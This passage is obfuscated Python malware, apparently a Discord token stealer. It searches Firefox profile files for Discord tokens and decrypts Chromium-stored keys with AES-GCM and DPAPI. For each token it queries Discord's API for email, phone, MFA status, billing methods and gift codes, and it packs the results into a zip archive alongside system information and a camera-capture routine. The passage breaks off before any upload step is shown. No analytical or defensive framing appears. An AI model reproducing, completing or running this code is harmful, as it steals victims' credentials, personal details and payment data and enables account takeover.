                                            CETOXSGLJGPGGFQRAIEUIADYJNQMDAKEWUNIQAZMWKUWTMZFPZDLEGSIHBATQZPVETGGSLQBYLWSXVZEHJKIDKIVPDFSVARGL.append(EMVMHNXKRYAPKGBJOKJJYEHFSASAECQGVFJZQFNVDUNEJJYPYOIOWVVFZFMMMLBEBKKMMUGVYYGLWFJFU)
                                            LVQYCZJSXUVCNUAEBELCPGVXGIOYRKXPGVXEVIWCHDRBKWCDWWERJCKJEQIPZLFTZYUFCWUYVDASRE[FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO] = (HCRCPVLVMSTODENTZNSWAEJGDIOYGBKTKQPFIMIYRCSVMWXYYCLPRCMTODFBTKJMRGJPCF, IOPTUORVXXAOZGQKENOGHONVMZRTLFXMPPGXHIYBUDJZUVBXTHSEUFZQNJUZFEZWAFRTLGFNHELAJGRKSP)

        if os.path.exists(os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, "Mozilla", "Firefox", "Profiles")):
            for JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI, _, v4r_files in os.walk(os.path.join(WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR, "Mozilla", "Firefox", "Profiles")):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(os.path.join(JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI, v4r__file), errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO in re.findall(VRQAYXGKFGLREJYKVUKEPGXJLUHQEUXNUOJGLSEBWYMLOZHPPWGLTPMILXILCHBUSDJAFJR, v4r_line.strip()):
                                    if TNROORJPOGJCGGACTOQRMLRWUELGEFIWZFDADNZUEHOZYIWRXODCYNJTTEHAYGIKBSZURIEOKDRRSSFCFXIFI(FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO, WALVXFGQGJKFFWZBBNPASYPMBIDHTIAKBFPZDLSYXSNUSHWIYLEAYUNHRKCLHACCZXRFBSJFXA):
                                        EMVMHNXKRYAPKGBJOKJJYEHFSASAECQGVFJZQFNVDUNEJJYPYOIOWVVFZFMMMLBEBKKMMUGVYYGLWFJFU = requests.get(WALVXFGQGJKFFWZBBNPASYPMBIDHTIAKBFPZDLSYXSNUSHWIYLEAYUNHRKCLHACCZXRFBSJFXA, headers={'Authorization': FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO}).json()['id']
                                        if EMVMHNXKRYAPKGBJOKJJYEHFSASAECQGVFJZQFNVDUNEJJYPYOIOWVVFZFMMMLBEBKKMMUGVYYGLWFJFU not in CETOXSGLJGPGGFQRAIEUIADYJNQMDAKEWUNIQAZMWKUWTMZFPZDLEGSIHBATQZPVETGGSLQBYLWSXVZEHJKIDKIVPDFSVARGL:
                                            FNMYGZRCXTMVFRHAKHPOCRSKAHLFJWVVPLXDUEIQTLUNRPRRMDHWSRCDXDLVOJOMYOQNZRHIHBSJSURHKTF.append(FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO)
                                            CETOXSGLJGPGGFQRAIEUIADYJNQMDAKEWUNIQAZMWKUWTMZFPZDLEGSIHBATQZPVETGGSLQBYLWSXVZEHJKIDKIVPDFSVARGL.append(EMVMHNXKRYAPKGBJOKJJYEHFSASAECQGVFJZQFNVDUNEJJYPYOIOWVVFZFMMMLBEBKKMMUGVYYGLWFJFU)
                                            LVQYCZJSXUVCNUAEBELCPGVXGIOYRKXPGVXEVIWCHDRBKWCDWWERJCKJEQIPZLFTZYUFCWUYVDASRE[FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO] = ('Firefox', os.path.join(JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI, v4r__file))
        return FNMYGZRCXTMVFRHAKHPOCRSKAHLFJWVVPLXDUEIQTLUNRPRRMDHWSRCDXDLVOJOMYOQNZRHIHBSJSURHKTF, LVQYCZJSXUVCNUAEBELCPGVXGIOYRKXPGVXEVIWCHDRBKWCDWWERJCKJEQIPZLFTZYUFCWUYVDASRE

    def TNROORJPOGJCGGACTOQRMLRWUELGEFIWZFDADNZUEHOZYIWRXODCYNJTTEHAYGIKBSZURIEOKDRRSSFCFXIFI(FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO, WALVXFGQGJKFFWZBBNPASYPMBIDHTIAKBFPZDLSYXSNUSHWIYLEAYUNHRKCLHACCZXRFBSJFXA):
        return requests.get(WALVXFGQGJKFFWZBBNPASYPMBIDHTIAKBFPZDLSYXSNUSHWIYLEAYUNHRKCLHACCZXRFBSJFXA, headers={'Authorization': FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO}).status_code == 200

    def MBSNERXDCKYYXOBULWTPIXYBBXCXYSVSPRGGSGQEZQLOLVKOQHOFVPDZVSLCVBVDUKNQOUNTTEFTBTHKXROVal(COAXMVSAMJMSUZLGOMDZBDWJUHUZCKZQFDDUQHROXYEYUIIMLFGUUAXNDWPDGHE, POIXTKOSBTXIFOMNJAULQKIZSNRVUFSNSXAFATKVQRRMVYDWKBJNIJTYXGTGIJTTKZKZAXABJMAXV):
        PCYDBIBYCVPYXHIKVMQUYAXEKFMZRHSEOQSIIIKDVKNAFWDYKDAGRHSQWJFUHISEHGONKJGXFLNVRSYFDSNSPBGQCAQWSJ = COAXMVSAMJMSUZLGOMDZBDWJUHUZCKZQFDDUQHROXYEYUIIMLFGUUAXNDWPDGHE[3:15]
        GQRVHXWZCEPUHVQHWIPNYNAWYWBLIGTBHFCXXUANWBNSZQGDVUJACXGZBOAPTANFLJFNOOCYPGESVQNXSOOWPWTIXDKQU = COAXMVSAMJMSUZLGOMDZBDWJUHUZCKZQFDDUQHROXYEYUIIMLFGUUAXNDWPDGHE[15:]
        SOZNDKKQHTRJHCSCFHHQGDVBIZUZMOQSBSMIUUCVOMYSNVKLXACCHHKCKZHQRNETUFFOZO = AES.new(POIXTKOSBTXIFOMNJAULQKIZSNRVUFSNSXAFATKVQRRMVYDWKBJNIJTYXGTGIJTTKZKZAXABJMAXV, AES.MODE_GCM, PCYDBIBYCVPYXHIKVMQUYAXEKFMZRHSEOQSIIIKDVKNAFWDYKDAGRHSQWJFUHISEHGONKJGXFLNVRSYFDSNSPBGQCAQWSJ)
        return SOZNDKKQHTRJHCSCFHHQGDVBIZUZMOQSBSMIUUCVOMYSNVKLXACCHHKCKZHQRNETUFFOZO.decrypt(GQRVHXWZCEPUHVQHWIPNYNAWYWBLIGTBHFCXXUANWBNSZQGDVUJACXGZBOAPTANFLJFNOOCYPGESVQNXSOOWPWTIXDKQU)[:-16].decode()

    def UJBHMAZCWQDNSEXJCGXCLDYWRBOUAAKQEVRCMJGXEWHXHLCNWPXLZOMMKZHIOXRSWCFRCTRMNWOS(JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI):
        if not os.path.exists(JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI):
            return None
        with open(JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI, "r", encoding="utf-8") as v4r_f:
            YNZUASGJCCKRNFSUUSBBNCAHLPWIYJZRNCZBYYNUDERUAQQOZTBENPHPQTZELNZRQMUUZAITUOYQFPEVMGXVMUXOWGTQQW = json.load(v4r_f)
        POIXTKOSBTXIFOMNJAULQKIZSNRVUFSNSXAFATKVQRRMVYDWKBJNIJTYXGTGIJTTKZKZAXABJMAXV = base64.b64decode(YNZUASGJCCKRNFSUUSBBNCAHLPWIYJZRNCZBYYNUDERUAQQOZTBENPHPQTZELNZRQMUUZAITUOYQFPEVMGXVMUXOWGTQQW["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(POIXTKOSBTXIFOMNJAULQKIZSNRVUFSNSXAFATKVQRRMVYDWKBJNIJTYXGTGIJTTKZKZAXABJMAXV, None, None, None, 0)[1]

    FNMYGZRCXTMVFRHAKHPOCRSKAHLFJWVVPLXDUEIQTLUNRPRRMDHWSRCDXDLVOJOMYOQNZRHIHBSJSURHKTF, LVQYCZJSXUVCNUAEBELCPGVXGIOYRKXPGVXEVIWCHDRBKWCDWWERJCKJEQIPZLFTZYUFCWUYVDASRE = EQQWSUGPVGHJUIASKRAIXNYNNHJQPOYXBKHJKNDJGQQYBLABFCUCNFTJDDJYRKNROQHUSMXRFXUICAZWSSZWTRGQNQLP()
    
    if not FNMYGZRCXTMVFRHAKHPOCRSKAHLFJWVVPLXDUEIQTLUNRPRRMDHWSRCDXDLVOJOMYOQNZRHIHBSJSURHKTF:
        MLCBDAROJZPSDOYHBUDUSAFDHQNZJHDSBRQEWOGRFCYCYYNGTSSWYVFVBRGPDVWSEHOVDJDD = "No discord tokens found."

    for FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO_d15c0rd in FNMYGZRCXTMVFRHAKHPOCRSKAHLFJWVVPLXDUEIQTLUNRPRRMDHWSRCDXDLVOJOMYOQNZRHIHBSJSURHKTF:
        SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY += 1

        try: AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO_d15c0rd}).json()
        except: AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU = {"None": "None"}

        NSIFALXNANAMIOHLKGIJTRQYHNTKDLAVXSJSLBHFJHYMWYQUMXYQ = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('username', "None") + '#' + AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('discriminator', "None")
        QPLZCBJNRIZSAUMZIBPQFUCHUJRXIIMMZPFCLFGPJFOHPBVVMSMBU = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('global_name', "None")
        SSZPYXIRBWNZRFMVOFWDUHPCEERZBRFFFEBEDAUJGVZXFAUGYBOPXOC = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('id', "None")
        TZVIYVCKNMPMFGFEXEZTUVHZMAEXKWEALTAOUBAKGANSDLMQCSBMNTBGBDSYRYZWACSBJI = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('email', "None")
        REJDAANUEKJNXLIAPSSWBDOKVNLKWTNXDIAMXDIGJYHOTLHPCXUQQRTDGCTETZNNLXRRDLDCWISZRP = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('verified', "None")
        JRTUKQSZISSVPCYEHHCLBLJQAKZZOPOGVISYSYTYFQEPXNBKKWKTOSXLNXDNYI = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('phone', "None")
        GINNJSCSEEIICFCKLUXQJHBNAVOQMURTSHCPXVTJNVSMNARMYWBDRXNFEDTJJVPFAI = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('locale', "None")
        LTHLZQRRCLWDUXGDARKISTFOPBYVYZYBCWVCPNTXXGJBVPEWUZLTPTIBLJZAHKCBYSIORRWIEFILTMNRNZZJYGOAPNVZF = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('mfa_enabled', "None")

        try:
            if AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('premium_type', 'None') == 0:
                SAAOKFLLHEKXQLGFZTDIJXKOBHTGUCRCCEPOIBVSFVZMAWPEIKKNBGQXJYKKW = 'False'
            elif AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('premium_type', 'None') == 1:
                SAAOKFLLHEKXQLGFZTDIJXKOBHTGUCRCCEPOIBVSFVZMAWPEIKKNBGQXJYKKW = 'Nitro Classic'
            elif AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('premium_type', 'None') == 2:
                SAAOKFLLHEKXQLGFZTDIJXKOBHTGUCRCCEPOIBVSFVZMAWPEIKKNBGQXJYKKW = 'Nitro Boosts'
            elif AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('premium_type', 'None') == 3:
                SAAOKFLLHEKXQLGFZTDIJXKOBHTGUCRCCEPOIBVSFVZMAWPEIKKNBGQXJYKKW = 'Nitro Basic'
            else:
                SAAOKFLLHEKXQLGFZTDIJXKOBHTGUCRCCEPOIBVSFVZMAWPEIKKNBGQXJYKKW = 'False'
        except:
            SAAOKFLLHEKXQLGFZTDIJXKOBHTGUCRCCEPOIBVSFVZMAWPEIKKNBGQXJYKKW = "None"

        try: DPAMRWURCPZNRDPSTWIIJTGVNCLKZRPKDMZHDCCLNXOMRDMFQBLIPRLXLLKIUETO = f"https://cdn.discordapp.com/avatars/{SSZPYXIRBWNZRFMVOFWDUHPCEERZBRFFFEBEDAUJGVZXFAUGYBOPXOC}/{AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{SSZPYXIRBWNZRFMVOFWDUHPCEERZBRFFFEBEDAUJGVZXFAUGYBOPXOC}/{AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{SSZPYXIRBWNZRFMVOFWDUHPCEERZBRFFFEBEDAUJGVZXFAUGYBOPXOC}/{AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU['avatar']}.png"
        except: DPAMRWURCPZNRDPSTWIIJTGVNCLKZRPKDMZHDCCLNXOMRDMFQBLIPRLXLLKIUETO = "None"

        try:
            HNOXUHWPVDLCRTSBNADSVQHQOZZZSNNOHPSDLDJRWNLZFFJEAHVFA = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO_d15c0rd}).json()
            if HNOXUHWPVDLCRTSBNADSVQHQOZZZSNNOHPSDLDJRWNLZFFJEAHVFA:
                ABJXKUGNHYMURLEMQQTTXSOIWRJCQALIPCNNXQYSFTWLUPRJWYEW = []

                for v4r_method in HNOXUHWPVDLCRTSBNADSVQHQOZZZSNNOHPSDLDJRWNLZFFJEAHVFA:
                    if v4r_method['type'] == 1:
                        ABJXKUGNHYMURLEMQQTTXSOIWRJCQALIPCNNXQYSFTWLUPRJWYEW.append('Bank Card')
                    elif v4r_method['type'] == 2:
                        ABJXKUGNHYMURLEMQQTTXSOIWRJCQALIPCNNXQYSFTWLUPRJWYEW.append("Paypal")
                    else:
                        ABJXKUGNHYMURLEMQQTTXSOIWRJCQALIPCNNXQYSFTWLUPRJWYEW.append('Other')
                ABJXKUGNHYMURLEMQQTTXSOIWRJCQALIPCNNXQYSFTWLUPRJWYEW = ' / '.join(ABJXKUGNHYMURLEMQQTTXSOIWRJCQALIPCNNXQYSFTWLUPRJWYEW)
            else:
                ABJXKUGNHYMURLEMQQTTXSOIWRJCQALIPCNNXQYSFTWLUPRJWYEW = "None"
        except:
            ABJXKUGNHYMURLEMQQTTXSOIWRJCQALIPCNNXQYSFTWLUPRJWYEW = "None"

        try:
            BZGJNDKMAIOUIOJUHSVHANXRPRRTZRBRJUEHYRJCHVELAKQPNVOAEFXMMCMGEPHGNDNVETZIBYGYWCVV = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO_d15c0rd}).json()
            if BZGJNDKMAIOUIOJUHSVHANXRPRRTZRBRJUEHYRJCHVELAKQPNVOAEFXMMCMGEPHGNDNVETZIBYGYWCVV:
                DNPYWSODHDAMLLUUIWHEEPILWOOZTUJIRVAJUQZQZOBGAWAQHCUNXTACJGASUPGHR = []
                for RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB in BZGJNDKMAIOUIOJUHSVHANXRPRRTZRBRJUEHYRJCHVELAKQPNVOAEFXMMCMGEPHGNDNVETZIBYGYWCVV:
                    HCRCPVLVMSTODENTZNSWAEJGDIOYGBKTKQPFIMIYRCSVMWXYYCLPRCMTODFBTKJMRGJPCF = RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB['promotion']['outbound_title']
                    RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB = RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB['code']
                    PJVJUGBFHMDVCOZMSECUMKPPFLKXRERRLHMBZEIKHCEFRDPQNRUYAICKWZXOIDRWVC = f"Gift: \"{HCRCPVLVMSTODENTZNSWAEJGDIOYGBKTKQPFIMIYRCSVMWXYYCLPRCMTODFBTKJMRGJPCF}\" Code: \"{RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB}\""
                    if len('\n\n'.join(RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB)) + len(PJVJUGBFHMDVCOZMSECUMKPPFLKXRERRLHMBZEIKHCEFRDPQNRUYAICKWZXOIDRWVC) >= 1024:
                        break
                    DNPYWSODHDAMLLUUIWHEEPILWOOZTUJIRVAJUQZQZOBGAWAQHCUNXTACJGASUPGHR.append(PJVJUGBFHMDVCOZMSECUMKPPFLKXRERRLHMBZEIKHCEFRDPQNRUYAICKWZXOIDRWVC)
                if len(DNPYWSODHDAMLLUUIWHEEPILWOOZTUJIRVAJUQZQZOBGAWAQHCUNXTACJGASUPGHR) > 0:
                    RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB = '\n\n'.join(DNPYWSODHDAMLLUUIWHEEPILWOOZTUJIRVAJUQZQZOBGAWAQHCUNXTACJGASUPGHR)
                else:
                    RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB = "None"
            else:
                RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB = "None"
        except:
            RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB = "None"
    
        try: v4r_software_name, JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI = LVQYCZJSXUVCNUAEBELCPGVXGIOYRKXPGVXEVIWCHDRBKWCDWWERJCKJEQIPZLFTZYUFCWUYVDASRE.get(FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO_d15c0rd, ("Unknown", "Unknown"))
        except: v4r_software_name, JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI = "Unknown", "Unknown"

        MLCBDAROJZPSDOYHBUDUSAFDHQNZJHDSBRQEWOGRFCYCYYNGTSSWYVFVBRGPDVWSEHOVDJDD = MLCBDAROJZPSDOYHBUDUSAFDHQNZJHDSBRQEWOGRFCYCYYNGTSSWYVFVBRGPDVWSEHOVDJDD + f"""
Discord Account n°{str(SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY)}:
 - Path Found      : {JXOHXSSIBSYAEKQOMLRXIYFVXACOOBURDCJMCUFLHDPRCXZSUMIRATGAI}
 - Software        : {v4r_software_name}
 - Token           : {FXVJWVLHEMMWKFIQDVXQHDTCIWFOPQSSYMBPOXHIHXVMWRAHOHTRTPQUJO_d15c0rd}
 - Username        : {NSIFALXNANAMIOHLKGIJTRQYHNTKDLAVXSJSLBHFJHYMWYQUMXYQ}
 - Display Name    : {QPLZCBJNRIZSAUMZIBPQFUCHUJRXIIMMZPFCLFGPJFOHPBVVMSMBU}
 - Id              : {SSZPYXIRBWNZRFMVOFWDUHPCEERZBRFFFEBEDAUJGVZXFAUGYBOPXOC}
 - Email           : {TZVIYVCKNMPMFGFEXEZTUVHZMAEXKWEALTAOUBAKGANSDLMQCSBMNTBGBDSYRYZWACSBJI}
 - Email Verified  : {REJDAANUEKJNXLIAPSSWBDOKVNLKWTNXDIAMXDIGJYHOTLHPCXUQQRTDGCTETZNNLXRRDLDCWISZRP}
 - Phone           : {JRTUKQSZISSVPCYEHHCLBLJQAKZZOPOGVISYSYTYFQEPXNBKKWKTOSXLNXDNYI}
 - Nitro           : {SAAOKFLLHEKXQLGFZTDIJXKOBHTGUCRCCEPOIBVSFVZMAWPEIKKNBGQXJYKKW}
 - Language        : {GINNJSCSEEIICFCKLUXQJHBNAVOQMURTSHCPXVTJNVSMNARMYWBDRXNFEDTJJVPFAI}
 - Billing         : {ABJXKUGNHYMURLEMQQTTXSOIWRJCQALIPCNNXQYSFTWLUPRJWYEW}
 - Gift Code       : {RCOPOIGHLXDWLEVDDMGMUUGDOGSZRRSFWVUMUVAXQSMVBZBQTPDLBFGOQRWRGFECNOUFBMYVATB}
 - Profile Picture : {DPAMRWURCPZNRDPSTWIIJTGVNCLKZRPKDMZHDCCLNXOMRDMFQBLIPRLXLLKIUETO}
 - Multi-Factor Authentication : {LTHLZQRRCLWDUXGDARKISTFOPBYVYZYBCWVCPNTXXGJBVPEWUZLTPTIBLJZAHKCBYSIORRWIEFILTMNRNZZJYGOAPNVZF}
"""
    DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD.writestr(f"Discord Accounts ({SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY}).txt", MLCBDAROJZPSDOYHBUDUSAFDHQNZJHDSBRQEWOGRFCYCYYNGTSSWYVFVBRGPDVWSEHOVDJDD)

    return SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY

YBYQXNYWHYDIHHZRNLHOCSXJXXGJGRTXVBOWFDKFHLILBLZDPQRRUOPHLYFMHLST = []

GPYKYMFEVOAECAJZHTWRAAZCKOPCQXHNPOZGTSFGQJDAIXQTVEXEGNIKCTSSZMDJPPFERAIGHLYHYJSUAEDTLTASGETPSKIAPX = io.BytesIO()
with zipfile.ZipFile(GPYKYMFEVOAECAJZHTWRAAZCKOPCQXHNPOZGTSFGQJDAIXQTVEXEGNIKCTSSZMDJPPFERAIGHLYHYJSUAEDTLTASGETPSKIAPX, "w", zipfile.ZIP_DEFLATED) as DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD:

    try: 
        HAOVZJMOWXECWQFFMPQLPSEXOJVJVKEIZMUWHNKPBKZSVJDWUSHRZVWJYXITPIZBPIATE = ZYMMMWLKRWFVJABPLXPYAYIJOLYYRGCCSPCOQZJXKOJKDYZDACQYVPKDEGKOPNPBQGSQWSAZWGLNBVEGUYVEQTCLSNHOWCVGKZEE()
    except Exception as e:
        HAOVZJMOWXECWQFFMPQLPSEXOJVJVKEIZMUWHNKPBKZSVJDWUSHRZVWJYXITPIZBPIATE = f"Error: {e}"

    try: 
        HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_system_info = MBJHIYVNSVHBSLWQSUJADQJBLCNJGCTSDKGBIIOARQCSYCJGUZBSBPNTOFBT(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD)
    except Exception as e:
        HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_system_info = f"Error: {e}"

    try: 
        SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY = HUETVNGSPQYJJRBBSIDQZCWMBFGBAGNQGOZBKSTIAPEXCTWNXKMMHSJHWFLDBTWQTWJWOLWKYCVGHJLUZPFBNJPJAS(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD)
    except Exception as e:
        SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY = f"Error: {e}"

    try: 
        YHJNIVWXKWYIIBYVHJTZRRUNWBBOEVVCXUGDBHNQDKXDIVEMKPMMMUH, RPFYVOWIVYIEBFBYLBQQUFLPRCGFRSIKAEAMGGSYUAASFJOMBOWRKYYMBQDHHVHPFNVIX, HVNCSTIRHDVFALETMTKYDVXEFUKSABPTWBGLZGWCKTBHPRAGSGRVFDMYSPDKZSRGHJQXNIMCXPS, HFGUVHTXCHAEOCHEOKWQGCUIPNYAHIIUCOAEPSNTBYIQYIELAJSKRPAWFSJUZXFFARQSLYKB, YZINSDQVFUIYGQMYNKTYBTXHYLTOZHVJHEKDJLHHJQYFHNVGGWRZSCMCMKJAQVUPWNVQLNWJQAVWLPDJGREHRTZUEQBSFY, ATJQNUCVALRAUPTRJFHBAFEZRWEKEWBXNCHRGWSXLVXFVWZVJBXVAIPLJRXFVXYEVDGQTZYEQXSFDHPJFRO = TQNPAUYJLYMXDXYDVVSYVHLDUKJOIJQOUBMHAXCGJSWBATUYJJDWYDPIIAZJVBIKEUMUXUNNSIUTGUHIPAUKQJJMMYSTRDDZHEM(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD)
    except Exception as e:
        YHJNIVWXKWYIIBYVHJTZRRUNWBBOEVVCXUGDBHNQDKXDIVEMKPMMMUH = f"Error: {e}"
        RPFYVOWIVYIEBFBYLBQQUFLPRCGFRSIKAEAMGGSYUAASFJOMBOWRKYYMBQDHHVHPFNVIX = f"Error: {e}"
        HVNCSTIRHDVFALETMTKYDVXEFUKSABPTWBGLZGWCKTBHPRAGSGRVFDMYSPDKZSRGHJQXNIMCXPS = f"Error: {e}"
        HFGUVHTXCHAEOCHEOKWQGCUIPNYAHIIUCOAEPSNTBYIQYIELAJSKRPAWFSJUZXFFARQSLYKB = f"Error: {e}"
        YZINSDQVFUIYGQMYNKTYBTXHYLTOZHVJHEKDJLHHJQYFHNVGGWRZSCMCMKJAQVUPWNVQLNWJQAVWLPDJGREHRTZUEQBSFY = f"Error: {e}"
        ATJQNUCVALRAUPTRJFHBAFEZRWEKEWBXNCHRGWSXLVXFVWZVJBXVAIPLJRXFVXYEVDGQTZYEQXSFDHPJFRO = f"Error: {e}"

    try: 
        ZSIRONJCJZMWMECOQKEMDGZRMTQPLRRIWGINIUGEEBOGIALUSQGVPKGSKHCVTL = CIYLZERZWXKWLAMPSAVTLWAYHQJSQCIXFEJNQKJYSWIYPDUZZHZTNWXTSESXLELTGAPLJMSJWTFJ(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD)
    except Exception as e:
        ZSIRONJCJZMWMECOQKEMDGZRMTQPLRRIWGINIUGEEBOGIALUSQGVPKGSKHCVTL = f"Error: {e}"

    try: 
        HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_camera_capture = HYVNLFBPZZJSLIJSYUBEWIKHYUASUXBARDFKSWCFJBCIXQRBMO(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD)
    except Exception as e:
